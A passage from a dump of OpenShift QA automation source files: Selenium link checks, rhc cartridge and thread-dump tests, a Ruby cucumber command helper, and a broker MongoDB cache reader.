page\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[2]/p[5]/a''')\n web.click_element_by_link_text(\"see our Videos page\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Videos''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n\n\n\n\n\n\n\n #check the \"community forum\" link \n web.assert_text_equal_by_xpath(\"community forum\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[2]/a''')\n web.click_element_by_link_text(\"community forum\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Forums''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"search\" link \n web.click_element_by_xpath(\"//div[@id='content']/div/div/div/div[2]/div/section/div[3]/form/button\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Search''','''//div[@id='content']/div/div/div/div/div/h1/div''') \n web.go_back()\n #check the \"Knowledge Base\" link \n web.assert_text_equal_by_xpath(\"Knowledge Base\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[3]/a''')\n web.click_element_by_link_text(\"Knowledge Base\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Knowledge Base''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"FAQ\" link \n web.assert_text_equal_by_xpath(\"FAQ\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[3]/a[2]''')\n web.click_element_by_link_text(\"FAQ\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Frequently Asked 
Questions''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"freenode.net on channel #openshift\" link \n web.assert_text_equal_by_xpath(\"freenode.net on channel #openshift\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[3]/p[4]/a''')\n web.click_element_by_link_text(\"freenode.net on channel #openshift\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Connection details''','''//body/div/div/div[2]/a''') \n web.go_back()\n\n\n\n\n\n #check the \"Subscribe today\" link \n web.assert_text_equal_by_xpath(\"Subscribe today\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[3]/a''')\n web.click_element_by_link_text(\"Subscribe today\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Thanks for signing up for the OpenShift Newsletter which includes news and events, tips and tricks and other useful information concerning the OpenShift platform-as-a-service. Please provide a valid email address and click submit.''','''//body/div[2]/form/div/p''') \n web.go_back()\n #check the \"powered by open source\" link \n web.assert_text_equal_by_xpath(\"powered by open source\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[4]/a''')\n web.click_element_by_link_text(\"powered by open source\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift is Open Source''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"run on your laptop\" link \n web.assert_text_equal_by_xpath(\"run on your laptop\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[4]/a[2]''')\n web.click_element_by_link_text(\"run on your laptop\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''OpenShift Origin Source Code''','''//div[@id='content']/div/div/div/div/div/h1''') \n web.go_back()\n #check the \"Get involved today\" link \n web.assert_text_equal_by_xpath(\"Get involved today\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[4]/a[3]''')\n web.click_element_by_link_text(\"Get involved today\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Get Involved''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n\n #check the \"@openshift\" link \n web.assert_text_equal_by_xpath(\"@openshift\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[5]/a''')\n web.assert_text_equal_by_xpath('''@openshift''','''//a[@href='http://www.twitter.com/#!/openshift']''') \n #check the \"OpenShift blog\" link \n web.assert_text_equal_by_xpath(\"OpenShift blog\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[5]/a[2]''')\n web.click_element_by_link_text(\"OpenShift blog\")\n time.sleep(2)\n web.assert_text_equal_by_xpath('''Blogs''','''//div[@id='content']/div/div/div/div[3]/div/h1/div''') \n web.go_back()\n #check the \"file a bug\" link \n web.assert_text_equal_by_xpath(\"file a bug\",'''//div[@id='content']/div/div/div/div[2]/div/section/div[4]/p[6]/a''')\n web.assert_text_equal_by_xpath('''file a bug''','''//a[contains(@href, 'https://bugzilla.redhat.com/enter_bug.cgi?product=OpenShift')]''') \n web.go_back()\n\n\n\n web.delete_app(\"python\")\n\n\n \n \n self.tearDown()\n\n return self.passed(\" case_165717--CheckOpensourcePage passed successfully.\")\n\n\n def tearDown(self):\n self.config.web.driver.quit()\n self.assert_equal([], self.config.web.verificationErrors)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CheckOpensourcePage)\n 
return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of case_165717.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.44861987233161926, "alphanum_fraction": 0.4567675292491913, "avg_line_length": 45.612403869628906, "blob_id": "67aa84b2f3a6e55679a8537964c9531634185776", "content_id": "a1b6090eb42975059b13b56eb238bcd413eb3fff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6014, "license_type": "no_license", "max_line_length": 144, "num_lines": 129, "path": "/automation/open/testmodules/RT/cartridge/mysql_control_embedded_cartridge.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nSept 24, 2012\n\n[US2105][US2110][US1386][[Runtime][cartridge]Control embedded MySQL\nhttps://tcms.engineering.redhat.com/case/167565/?from_plan=4962\n\"\"\"\n\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = '[US1386][Runtime][cartridge]Control embedded MySQL'\n \n try:\n test_name = self.get_variant()\n except:\n self.info(\"WARN: Missing OPENSHIFT_test_name, used `php` as default\")\n test_name = 'php'\n\n self.info(\"VARIANT: %s\"%test_name)\n self.app_type = common.app_types[test_name]\n self.app_name = common.getRandomString(10)\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass MysqlControlEmbededCartridge(OpenShiftTest):\n def test_method(self):\n self.add_step(\"Creating an application\",\n common.create_app,\n function_parameters = [ self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, False ],\n expect_description = 'The app should be created successfully',\n expect_return = 0)\n\n self.add_step('Embedding MySQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['mysql']), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'MySQL 5.1 cartridge should be embedded successfully',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the started instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL 5.1 should be started',\n expect_str = [ 'MySQL is running' ])\n\n\n self.add_step(\n 'Stopping MySQL',\n \"rhc cartridge stop %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL 5.1 should be stopped',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the the stopped instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL 5.1 should be stopped',\n expect_str = [ 'MySQL is stopped' ])\n\n self.add_step(\n 'Restarting MySQL',\n \"rhc cartridge restart %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description 
= 'MySQL should be started',\n expect_return = 0)\n\n self.add_step(\n 'Ensuring the right status message of the started instance',\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email,\n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'MySQL should be started',\n expect_str = [ 'MySQL is running' ])\n\n self.add_step(\n 'Removing MySQL cartridge',\n \"rhc cartridge remove %s -a %s -l %s -p '%s' --confirm %s\" % ( common.cartridge_types['mysql'],\n self.app_name,\n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_description = 'The MySQL cartridge should be removed',\n expect_return = 0)\n\n self.run_steps()\n return self.passed(\"%s passed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(MysqlControlEmbededCartridge)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5817469954490662, "alphanum_fraction": 0.5922433733940125, "avg_line_length": 44.33064651489258, "blob_id": "d3a7210c62d64343c8dca656ecffbe1c73363eb6", "content_id": "616686555d143115ffd17089e6249ca77be95258", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5621, "license_type": "no_license", "max_line_length": 208, "num_lines": 124, "path": "/automation/open/testmodules/RT/client/thread_dump.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\"\"\"\nJiangtao Zhao\[email protected]\n2012-08-15\n\n[US2123][UI][rhc-client]threaddump for ruby-1.9 app\nhttps://tcms.engineering.redhat.com/case/177961/\n\"\"\"\nimport os\nimport common\nimport re\nimport OSConf\nimport rhtest\nimport pexpect\nimport time\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False # define to True if your test is interactive (takes user input).\n ITEST = ['DEV', 'INT', 'STG'] #this will be checked by framework\n WORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\n def initialize(self):\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"WARN: Missing variant, used `jbosseap` as default\")\n self.test_variant = 'jbosseap'\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.test_variant in ('ruby', 'ruby-1.9'):\n self.str_list = ['backtrace dump', 'abstract_request_handler.rb', 'install_useful_signal_handlers', 'call', 'accept_and_process_next_request', 'main_loop', 'start_request_handler']\n elif self.test_variant in ('jbosseap', 'jbossews', 'jbossews2','jbossews-2.0'):\n self.str_list = ['ContainerBackgroundProcessor', 'ConnectionValidator', 'IdleRemover', 'server-timer', 'DestroyJavaVM', 'MSC service', 'Reference Reaper', 'Finalizer', 'Reference Handler', 'Heap']\n self.summary = \"[US2123][UI][rhc-client]threaddump for %s app\" % (self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = \"threaddump\" + common.getRandomString(4)\n self.git_repo = \"./%s\" % (self.app_name)\n self.match_rate = 0.3\n common.env_setup()\n\n def finalize(self):\n try:\n self.child.sendcontrol('c')\n except:\n pass\n\n\nclass ThreaddumpTest(OpenShiftTest):\n def test_method(self):\n self.step(\"Create %s app: %s\" % (self.app_type, 
self.app_name))\n ret = common.create_app(self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n scalable=self.scalable, \n disable_autoscaling=False)\n self.assert_equal(ret, 0, \"Failed to create %s app: %s\" % (self.app_type, self.app_name))\n\n self.step(\"Add databases to the app\")\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mysql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to add mysql\")\n\n ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"postgresql\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n self.assert_equal(ret, 0, \"Failed to add postgresql\")\n\n #ret = common.embed(self.app_name, \"add-\" + common.cartridge_types[\"mongodb\"], self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n #self.assert_equal(ret, 0, \"Failed to add mongodb\")\n\n self.step(\"Applications must be accessed by their URL before you can take a thread dump\")\n app_url = OSConf.get_app_url(self.app_name)\n cmd = \"curl %s\" %(app_url)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.assert_equal(ret, 0, \"Fail to access app\")\n\n self.step(\"Generate threaddump file\")\n cmd = \"rhc threaddump %s -l %s -p '%s' %s\" % ( self.app_name, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd,\n common.RHTEST_RHC_CLIENT_OPTIONS)\n (ret, output) = common.command_getstatusoutput(cmd)\n self.assert_equal(ret, 0, \"Failed to generate threaddump file for %s app: %s\" % (self.app_type, self.app_name))\n self.debug(\"OUTPUT: %s\" % output)\n match = re.search(r'(?<=The thread dump file will be available via: ).*$', output, re.M)\n #match = re.search(r'(?<=rhc tail %s )-f \\S+' % (self.app_name), output)\n self.assert_not_equal(match, None, \"Failed to find command to see the threaddump file\")\n\n self.step(\"Check the threaddump file\")\n #tail_cmd = \"rhc tail %s \" % (self.app_name) + match.group(0) + \" -l %s -p '%s'\" % (self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n tail_cmd = match.group(0) + \" -l %s -p '%s'\" % (self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd)\n print \"Command: %s\" % (tail_cmd)\n self.child = pexpect.spawn(tail_cmd)\n time.sleep(10)\n match_num = 0.0\n for s in self.str_list:\n try:\n # increase the timeout from 3 to 10\n self.child.expect(s, timeout=20)\n match_num += 1\n except pexpect.TIMEOUT:\n pass\n rate = match_num/len(self.str_list)\n if rate >= self.match_rate:\n self.info(\"Successfully matched %d%% strings in the list\" % (int(rate*100)))\n return self.passed()\n else:\n self.info(\"Only matched %d%% strings in the list. 
The lowest match rate is %f%%\" % (int(rate*100), int(self.match_rate*100)))\n return self.failed()\n\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(ThreaddumpTest)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.645508348941803, "alphanum_fraction": 0.6573426723480225, "avg_line_length": 36.93877410888672, "blob_id": "9050766aa883dc7e008c09772c7b2a5b635889b4", "content_id": "528bfc578c7ed44b5c3f1693e8cab3204399028f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1859, "license_type": "no_license", "max_line_length": 93, "num_lines": 49, "path": "/automation/open/testmodules/UI/web/US1797_135717.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.common.exceptions import NoSuchElementException\nimport unittest, time, re\nimport baseutils\nimport HTMLTestRunner\n\nclass US1797135717(unittest.TestCase):\n def setUp(self):\n self.driver = \"\"\n self.base_url = \"\"\n self.profile = \"\"\n self.verificationErrors = []\n baseutils.initiate(self)\n self.confirm_link=self.cfg.confirm_url_express\n \n def test_u_s1797135717(self):\n driver = self.driver\n baseutils.login(self,self.cfg.new_user, self.cfg.password)\n #check if domain and default ssh key already exist\n if (not baseutils.has_domain(self)):\n baseutils.setup_domain(self)\n if (not baseutils.has_sshkey(self)):\n baseutils.setup_default_sshkey(self)\n\n baseutils.go_to_account_page(self)\n keyname='test'\n\n driver.find_element_by_link_text(\"Add a new key...\").click()\n driver.find_element_by_id(\"key_name\").clear()\n driver.find_element_by_id(\"key_name\").send_keys(keyname)\n driver.find_element_by_id(\"key_raw_content\").clear()\n driver.find_element_by_id(\"key_raw_content\").send_keys(baseutils.gen_sshkey()[1])\n driver.find_element_by_id(\"key_submit\").click()\n baseutils.wait_element_present_by_id(self, \"%s_sshkey\"%keyname)\n baseutils.assert_contain_text_by_xpath(self, keyname,\"id('%s_sshkey')/td[1]\"%keyname)\n \n def is_element_present(self, how, what):\n try: self.driver.find_element(by=how, value=what)\n except NoSuchElementException, e: return False\n return True\n \n def tearDown(self):\n self.driver.quit()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n" }, { "alpha_fraction": 0.5840548276901245, "alphanum_fraction": 0.5921115875244141, "avg_line_length": 28.17894744873047, "blob_id": "c8ea662c48f87982589cd8896c8321efff4e3f44", "content_id": "c412c30d4a2a362e98a427c0730a72a502d4244d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Ruby", "length_bytes": 8316, "license_type": "no_license", "max_line_length": 151, "num_lines": 285, "path": "/automation/open/testmodules/RT/cucumber/support/command_helper.rb", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "require 'timeout'\nrequire 'fileutils'\nrequire 'open3'\n\nmodule CommandHelper\n def run_stdout(cmd)\n\n exit_code = -1\n output = nil\n\n # Don't let a command run more than 5 minutes\n Timeout::timeout(500) do\n output = `#{cmd} 2>&1`\n exit_code = $?.exitstatus\n end\n\n exit_code.should == 0\n return output\n end\n\n def run(cmd, outbuf=[], retries=0)\n\n exit_code = -1\n output = nil \n # Don't let a 
command run more than 500 seconds\n    Timeout::timeout(500) do\n      output = `#{cmd} 2>&1`\n      exit_code = $?.exitstatus\n    end\n\n    exit_code.should == 0\n    return output\n  end\n\n  def run(cmd, outbuf=[], retries=0)\n\n    exit_code = -1\n    output = nil \n    # Don't let a 
add -l #{app.login} -a #{app.name} -p fakepw -c #{type} -d\")\n if type.start_with?('mysql-')\n app.mysql_hostname = /^Connection URL: mysql:\\/\\/(.*)\\/$/.match(result)[1]\n app.mysql_user = /^ +Root User: (.*)$/.match(result)[1]\n app.mysql_password = /^ +Root Password: (.*)$/.match(result)[1]\n app.mysql_database = /^ +Database Name: (.*)$/.match(result)[1]\n\n app.mysql_hostname.should_not be_nil\n app.mysql_user.should_not be_nil\n app.mysql_password.should_not be_nil\n app.mysql_database.should_not be_nil\n end\n\n app.embed = type\n app.persist\n return app\n end\n end\n\n def rhc_embed_remove(app)\n rhc_do('rhc_embed_remove') do\n puts app.name\n run(\"#{$rhc_app_script} cartridge remove -l #{app.login} -a #{app.name} -p fakepw -c #{app.embed} -d\").should == 0\n app.mysql_hostname = nil\n app.mysql_user = nil\n app.mysql_password = nil\n app.mysql_database = nil\n app.embed = nil\n app.persist\n return app\n end\n end\n\n def rhc_ctl_stop(app)\n rhc_do('rhc_ctl_stop') do\n run(\"#{$rhc_app_script} stop -l #{app.login} -a #{app.name} -p fakepw -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep '#{app.get_stop_string}'\").should == 0\n end\n end\n\n def rhc_add_alias(app)\n rhc_do('rhc_add_alias') do\n run(\"#{$rhc_app_script} add-alias -l #{app.login} -a #{app.name} -p fakepw --alias '#{app.name}-#{app.namespace}.example.com' -d\").should == 0\n end\n end\n\n def rhc_remove_alias(app)\n rhc_do('rhc_remove_alias') do\n run(\"#{$rhc_app_script} remove-alias -l #{app.login} -a #{app.name} -p fakepw --alias '#{app.name}-#{app.namespace}.example.com' -d\").should == 0\n end\n end\n\n def rhc_ctl_start(app)\n rhc_do('rhc_ctl_start') do\n run(\"#{$rhc_app_script} start -l #{app.login} -a #{app.name} -p fakepw -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep '#{app.get_stop_string}'\").should == 1\n end\n end\n\n def rhc_ctl_restart(app)\n rhc_do('rhc_ctl_restart') do\n run(\"#{$rhc_app_script} restart -l #{app.login} -a #{app.name} -p fakepw -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep '#{app.get_stop_string}'\").should == 1\n end\n end\n\n def rhc_ctl_destroy(app, use_hosts=true)\n rhc_do('rhc_ctl_destroy') do\n run(\"#{$rhc_app_script} destroy -l #{app.login} -a #{app.name} -p fakepw -b -d\").should == 0\n run(\"#{$rhc_app_script} status -l #{app.login} -a #{app.name} -p fakepw | grep 'does not exist'\").should == 0\n run(\"sed -i '/#{app.name}-#{app.namespace}.dev.rhcloud.com/d' /etc/hosts\") if use_hosts\n FileUtils.rm_rf app.repo\n FileUtils.rm_rf app.file\n end\n end\n\n def rhc_do(method, retries=2)\n i = 0\n while true\n begin\n yield\n break\n rescue Exception => e\n raise if i >= retries\n i += 1\n end\n end\n end\n\n #\n # useful methods to avoid duplicating effort\n #\n\n #\n # Count the number of processes owned by account with cmd_name\n #\n def num_procs acct_name, cmd_name\n\n ps_pattern = /^\\s*(\\d+)\\s+(\\S+)$/\n command = \"ps --no-headers -o pid,comm -u #{acct_name}\"\n\n stdin, stdout, stderr = Open3.popen3(command)\n\n stdin.close\n\n outstrings = stdout.readlines\n errstrings = stderr.readlines\n\n proclist = outstrings.collect { |line|\n match = line.match(ps_pattern)\n match and (match[1] if match[2] == cmd_name)\n }.compact\n\n found = proclist ? 
proclist.size : 0\n found\n end\n\n #\n # Count the number of processes owned by account that match the regex\n #\n def num_procs_like acct_name, regex\n command = \"ps --no-headers -f -u #{acct_name}\"\n\n stdin, stdout, stderr = Open3.popen3(command)\n\n stdin.close\n\n outstrings = stdout.readlines\n errstrings = stderr.readlines\n\n proclist = outstrings.collect { |line|\n line.match(regex)\n }.compact!\n\n found = proclist ? proclist.size : 0\n found\n end\nend\n\nWorld(CommandHelper)\n" }, { "alpha_fraction": 0.5420398116111755, "alphanum_fraction": 0.5450248718261719, "avg_line_length": 33.050846099853516, "blob_id": "39173860ea0b196c2abd72702d8b2d6020ff41ce", "content_id": "be5f5144afe3cb568dc226d88c33f31577c04a68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4020, "license_type": "no_license", "max_line_length": 86, "num_lines": 118, "path": "/automation/open/lib/brokerdb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen [email protected]\nHelper file for reading the broker's main DB (mongo)\n\"\"\"\nimport os\nimport json\nimport helper\nimport re\nimport cPickle as pickle\n\n\nclass BrokerDB(object):\n COLLECTIONS = (\"district\", \"usages\", \"user\", \"template\")\n EXPIRATION_PERIOD = 0.240 #15minutes?\n def __init__(self, dbs=\"openshift_broker_dev\", collections=[], force_cache=False):\n self.dbs=dbs\n self.collections={}\n self.force_cache = force_cache\n if not collections:\n collections = self.COLLECTIONS\n else:\n if type(collections) == str:\n collections = [collections]\n for c in collections:\n if not self._valid_cache(c) or force_cache:\n self.collections[c] = self._init_collection(c)\n self._do_cache_collection(c)\n else:\n #use cached data\n try:\n self.collections[c] = self._get_cache_collection(c)\n except:\n del(self.collections[c])\n self.collections[c] = self._init_collection(c)\n self._do_cache_collection(c)\n\n\n def _valid_cache(self, cname):\n return helper.valid_cache(self._get_cache_file(cname), \n self.EXPIRATION_PERIOD)\n\n def _get_cache_file(self, cname):\n return \"/tmp/brokerdb.%s.dump\"%cname\n\n def _do_cache_collection(self, cname):\n oldumask = os.umask(0000)\n filename=self._get_cache_file(cname)\n try:\n f = open(filename, 'wb')\n pickle.dump(self.collections[cname], f)\n f.close()\n os.umask(oldumask)\n except Exception as e:\n if os.path.exists(filename):\n os.unlink(filename)\n print \"ERROR: Unable to store cache %s\"%str(e)\n\n def _get_cache_collection(self, cname):\n filename=self._get_cache_file(cname)\n try:\n f = open(filename, 'rb')\n dump = pickle.load(f)\n f.close()\n if dump is None:\n raise Exception(\"None found in cache!\")\n return dump\n except Exception as e:\n print \"ERROR: Unable to load from cache %s\"%str(e)\n #let's delete corrupetd file if exists\n if os.path.exists(filename):\n os.unlink(filename)\n return None\n\n def get_collection(self, collection):\n if (self.collections.has_key(collection)):\n return self.collections[collection]\n else:\n self.collections[collection] = self._init_collection(collection)\n self._do_cache_collection(collection)\n return self.collections[collection]\n\n def _init_collection(self, collection, filter=None):\n if filter:\n cmd = \"db.%s.find(%s)\"%(collection, filter)\n else:\n cmd = \"db.%s.find()\"%collection\n return self._mongo(cmd)\n\n def _mongo(self, cmd):\n \"\"\"\n Returns json format of MONGO's output\n \"\"\"\n cmd = \"\"\"mongo --quiet %s <<EOF\n 
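Aside: the CommandHelper run method above pairs a hard Timeout with a bounded retry when the rhc tools exit with code 140 (no nodes available). For readers porting these cucumber helpers, here is a minimal Python 3 sketch of the same run-with-timeout-and-retry pattern; all names are illustrative and not part of this repository:

    import subprocess
    import time

    def run(cmd, outbuf=None, retries=0, timeout=500, max_retries=3):
        # Run a shell command, merging stdout and stderr like "cmd 2>&1".
        try:
            proc = subprocess.run(cmd, shell=True, capture_output=True,
                                  text=True, timeout=timeout)
            output, exit_code = proc.stdout + proc.stderr, proc.returncode
        except subprocess.TimeoutExpired:
            output, exit_code = "command timed out", 1
        # Bounded retry on the "no nodes available" exit code, as above.
        if exit_code == 140 and retries < max_retries:
            time.sleep(5)
            return run(cmd, outbuf, retries + 1, timeout, max_retries)
        if outbuf is not None:
            outbuf.append(output)
        return exit_code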
printjson(%s.toArray());\nEOF\"\"\"%(self.dbs, cmd)\n (status, output) = helper.remote_batch(cmd)\n if status != 0:\n raise Exception(\"Unable to get mongo dump from broker.\")\n # workaround because of a bug in paramiko - slow transfer of large files\n\n try:\n output = output.strip()\n output = output.strip('bye')\n output = re.sub('^bye$', '', output, flags=re.MULTILINE)\n output = re.sub(r'ISODate\\((\"[^\"]+\")\\)', r'\\1', output)\n output = output.strip()\n return json.loads(output)\n except Exception as e:\n print \"ERROR: %s\" % str(e)\n print \"OUTPUT:\\n%s\" % output\n return None\n\n def get_nodes_per_district(self, district=None):\n # Map each district name to its list of nodes; the 'district'\n # argument is accepted for compatibility but currently unused.\n l = {}\n for d in self.get_collection('district'):\n l[d['name']] = d['server_identities']\n return l\n\n" }, { "alpha_fraction": 0.645283043384552, "alphanum_fraction": 0.646792471408844, "avg_line_length": 29.813953399658203, "blob_id": "37f0b2b65dd444964705b31e3c4ac1352cf7fe8a", "content_id": "fc789314e02608d75d182a58abfd94d75aad22c4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1325, "license_type": "no_license", "max_line_length": 99, "num_lines": 43, "path": "/automation/open/testmodules/RT/quick_start/quick_start_spring_eap6.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\ntestdir = os.path.normpath(WORK_DIR + \"/../../../\")\nsys.path.append(testdir)\n\nimport common\nimport rhtest\nfrom quick_start_test import QuickStartTest\n\n\nclass QuickStartBookmarks(QuickStartTest):\n \n def __init__(self, config):\n rhtest.Test.__init__(self, config)\n self.config.application_type = common.app_types[\"jbosseap\"]\n self.config.application_embedded_cartridges = [ ]\n self.config.summary = \"[Runtime][rhc-cartridge]quick-start example: spring-eap6-quickstart\"\n self.config.git_upstream_url = \"git://github.com/openshift/spring-eap6-quickstart.git\"\n self.config.page = \"\" # means '/'\n self.config.page_pattern = \"Spring MVC Starter Application\"\n \n def post_configuration_steps(self):\n steps = [\n \"cd %s\" % self.config.application_name,\n \"git rm src/main/webapp/index.html\",\n \"git commit -m 'Removed default index.html'\"\n ]\n common.command_get_status(\" && \".join(steps))\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(QuickStartBookmarks)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.4202180504798889, "alphanum_fraction": 0.4311199188232422, "avg_line_length": 29.57575798034668, "blob_id": "7df43feade60b3a44972c5aefd8c5b3ac4855f46", "content_id": "41840a51c69f251b5fb53bf79ea09dfc47c158ef", "detected_licenses": [], "is_generated": false, "is_vendor": true, "language": "JavaScript", "length_bytes": 1009, "license_type": "no_license", "max_line_length": 73, "num_lines": 33, "path": "/jquerydev/1_userverify/js/user_verify.js", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "$(document).ready(function(){\n // text verification\n $(\"#verify_btn\").click(function(){\n // alert(\"hello\");\n var text_value = $(\"#user_name\").val();\n if (text_value == \"\") {\n alert(\"Pls input sth...\");\n }\n else {\n alert(\"congratulations!!!\");\n /*\n var base_url = \"http://127.0.0.1:8080/jquerydev/1_userverify\"\n var ajax_url = base_url + \"?text_value=\" \n + 
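Aside: BrokerDB above persists mongo dumps with pickle and checks freshness through helper.valid_cache, whose implementation is not shown in this section. The sketch below is one self-contained way such a check can work, under the assumption (suggested by the '15minutes?' comment next to EXPIRATION_PERIOD = 0.240) that the period is expressed in hours:

    import os
    import time
    import pickle

    def valid_cache(path, max_age_hours):
        # Fresh if the file exists and its mtime falls inside the window.
        return (os.path.exists(path) and
                time.time() - os.path.getmtime(path) < max_age_hours * 3600)

    def load_or_rebuild(path, builder, max_age_hours=0.240):
        # Return cached data when fresh, otherwise rebuild and re-cache it.
        if valid_cache(path, max_age_hours):
            with open(path, 'rb') as f:
                return pickle.load(f)
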